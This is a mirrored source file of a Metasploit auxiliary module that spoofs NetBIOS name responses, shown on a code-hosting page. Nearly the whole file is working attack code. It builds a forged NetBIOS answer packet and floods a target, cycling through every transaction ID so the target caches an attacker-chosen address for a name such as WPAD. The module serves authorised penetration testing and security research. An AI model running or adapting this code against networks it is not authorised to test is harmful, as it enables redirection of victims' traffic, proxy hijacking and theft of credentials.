Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/netbios/netbios_spoof.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Udp

8


9
  def initialize

10
    super(

11
      'Name' => 'NetBIOS Response Brute Force Spoof (Direct)',

12
      'Description' => %q{

13
          This module continuously spams NetBIOS responses to a target for given hostname,

14
        causing the target to cache a malicious address for this name. On high-speed local

15
        networks, the PPSRATE value should be increased to speed up this attack. As an

16
        example, a value of around 30,000 is almost 100% successful when spoofing a

17
        response for a 'WPAD' lookup. Distant targets may require more time and lower

18
        rates for a successful attack.

19
      },

20
      'Author' => [

21
        'vvalien',   # Metasploit Module (post)

22
        'hdm',       # Metasploit Module

23
        'tombkeeper' # Related Work

24
      ],

25
      'License' => MSF_LICENSE,

26
    )

27


28
    register_options(

29
      [

30
        Opt::RPORT(137),

31
        OptString.new('NBNAME', [ true, 'The NetBIOS name to spoof a reply for', 'WPAD' ]),

32
        OptAddress.new('NBADDR', [ true, 'The address that the NetBIOS name should resolve to', Rex::Socket.source_address('50.50.50.50') ]),

33
        OptInt.new('PPSRATE', [ true, 'The rate at which to send NetBIOS replies', 1_000])

34
      ],

35
      self.class

36
    )

37
  end

38


39
  def netbios_spam

40
    payload =

41
      "\xff\xff" + # TX ID (will brute force this)

42
      "\x85\x00" + # Flags = response + authoritative + recursion desired

43
      "\x00\x00" + # Questions = 0

44
      "\x00\x01" + # Answer RRs = 1

45
      "\x00\x00" + # Authority RRs = 0

46
      "\x00\x00" + # Additional RRs = 0

47
      "\x20" +

48
      Rex::Proto::SMB::Utils.nbname_encode([@fake_name.upcase].pack('A15') + "\x00") +

49
      "\x00" \

50
      "\x00\x20" + # Type = NB

51
      "\x00\x01" + # Class = IN

52
      "\x00\x04\x93\xe0" + # TTL long time

53
      "\x00\x06" + # Datalength = 6

54
      "\x00\x00" + # Flags B-node, unique

55
      Rex::Socket.addr_aton(@fake_addr)

56


57
    stime = Time.now.to_f

58
    pcnt = 0

59
    pps = 0

60


61
    print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")

62


63
    live = true

64
    while live

65
      0.upto(65535) do |txid|

66
        payload[0, 2] = [txid].pack('n')

67
        @sock.put(payload)

68
        pcnt += 1

69


70
        pps = (pcnt / (Time.now.to_f - stime)).to_i

71
        if pps > @targ_rate

72
          sleep(0.01)

73
        end

74
      rescue Errno::ECONNREFUSED

75
        print_error('Error: Target sent us an ICMP port unreachable, port is likely closed')

76
        live = false

77
        break

78
      end

79
    end

80


81
    print_status('Cleaning up...')

82
  end

83


84
  def run

85
    connect_udp

86
    @sock = udp_sock

87


88
    @targ_addr = rhost

89
    @targ_port = rport

90
    @targ_rate = datastore['PPSRATE']

91
    @fake_name = datastore['NBNAME']

92
    @fake_addr = datastore['NBADDR']

93


94
    netbios_spam

95


96
    disconnect_udp

97
  end

98
end

99


100